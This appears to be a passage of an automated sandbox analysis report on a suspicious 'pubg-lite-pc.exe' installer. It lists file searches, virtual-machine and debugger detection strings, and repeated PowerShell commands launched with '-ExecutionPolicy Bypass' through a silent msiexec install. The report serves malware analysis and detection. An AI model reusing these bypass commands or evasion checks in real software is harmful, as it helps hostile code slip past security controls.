Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A42B50 VirtualQuery,GetSystemInfo,1_2_00A42B50
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B34A0 FindFirstFileW,GetLastError,FindClose,1_2_009B34A0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009DA750 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,1_2_009DA750
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009EE850 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,1_2_009EE850
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009DAB50 FindFirstFileW,FindClose,1_2_009DAB50
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B2B40 FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,1_2_009B2B40
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B2ED0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,1_2_009B2ED0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009D0F10 FindFirstFileW,FindClose,1_2_009D0F10
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009CF3B0 FindFirstFileW,FindClose,DeleteFileW,GetLastError,1_2_009CF3B0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009DD4E0 FindFirstFileW,FindClose,1_2_009DD4E0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009BB850 FindFirstFileW,FindClose,FindClose,1_2_009BB850
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B7E80 FindFirstFileW,FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,1_2_009B7E80
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_6D982CF0 FindFirstFileW,FindClose,GetLastError,FindClose,1_2_6D982CF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009D99D0 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,1_2_009D99D0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\1BA8BE5 FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: powershell.exe, 00000011.00000003.65376120267.000002465E863000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000007.00000003.65133856773.0000020D99900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw
Source: powershell.exe, 00000011.00000003.65374119996.000002465E849000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 01234567890.0.0.0.%dVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IROOT\CIMV2SELECT * FROM Win32_ComputerSystemSELECT * FROM Win32_BIOSManufacturerModelVersionGetting system informationManufacturer [Model [BIOS [IsWow64Processkernel32Software\Microsoft\Windows NT\CurrentVersionSYSTEM\CurrentControlSet\Control\ProductOptionsCurrentMajorVersionNumberCurrentMinorVersionNumberCurrentVersionCurrentBuildNumberReleaseIdCSDVersionProductTypeProductSuiteWinNTServerNTSmall BusinessEnterpriseBackOfficeCommunicationServerTerminal ServerSmall Business(Restricted)EmbeddedNTDataCenterPersonalBladeEmbedded(Restricted)Security ApplianceStorage ServerCompute Server Failed to create IWbemLocator object. Error code: \\Could not connect to WMI provider. Error code: Failed to initialize security. Error code: Could not set proxy blanket. Error code: WQLWMI Query failed: []. Error code:
Source: powershell.exe, 00000016.00000003.65649868815.000002B419DFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A4A063 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A4A063
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B7020 LoadLibraryW,GetProcAddress,FreeLibrary,1_2_009B7020
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A4335B GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,1_2_00A4335B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A54D1F mov eax, dword ptr fs:[00000030h]1_2_00A54D1F
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A432EF mov esi, dword ptr fs:[00000030h]1_2_00A432EF
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A5FA8A mov eax, dword ptr fs:[00000030h]1_2_00A5FA8A
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_6D99EEB9 mov eax, dword ptr fs:[00000030h]1_2_6D99EEB9
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0094EF90 SetUnhandledExceptionFilter,1_2_0094EF90
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A4A063 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A4A063
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A45B37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00A45B37
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_6D98AEBD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6D98AEBD
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_6D98E9D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6D98E9D3

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1D88.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1D27.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1D28.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1D29.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Users\user\Desktop\pubg-lite-pc.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\1BA8BE5\pubg-lite-pc.msi" MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH=C:\Users\user\Desktop\pubg-lite-pc.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1660097954 " AI_EUIMSI="
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1D88.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1D27.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1D28.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1D29.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7419.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi73B8.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr73B9.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr73BA.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE5D4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE5A2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE5A3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE5A4.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss3EE5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3EB4.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3EB5.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3EB6.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA352.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiA310.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrA311.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrA312.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Users\user\Desktop\pubg-lite-pc.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\Common Apps\1.3.5\1BA8BE5\pubg-lite-pc.msi" MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH=C:\Users\user\Desktop\pubg-lite-pc.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1660097954 " AI_EUIMSI="Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1D88.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1D27.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1D28.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1D29.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7419.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi73B8.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr73B9.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr73BA.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE5D4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE5A2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE5A3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE5A4.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss3EE5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3EB4.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3EB5.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3EB6.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA352.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiA310.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrA311.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrA312.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1D88.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1D27.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1D28.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1D29.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7419.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi73B8.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr73B9.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr73BA.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE5D4.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiE5A2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrE5A3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrE5A4.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss3EE5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3EB4.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3EB5.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3EB6.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA352.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiA310.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrA311.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrA312.txt" -propSep " :<->: " -testPrefix "_testValue."Jump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009DD980 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle,1_2_009DD980
Source: C:\Users\user\Desktop\pubg-lite-pc.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
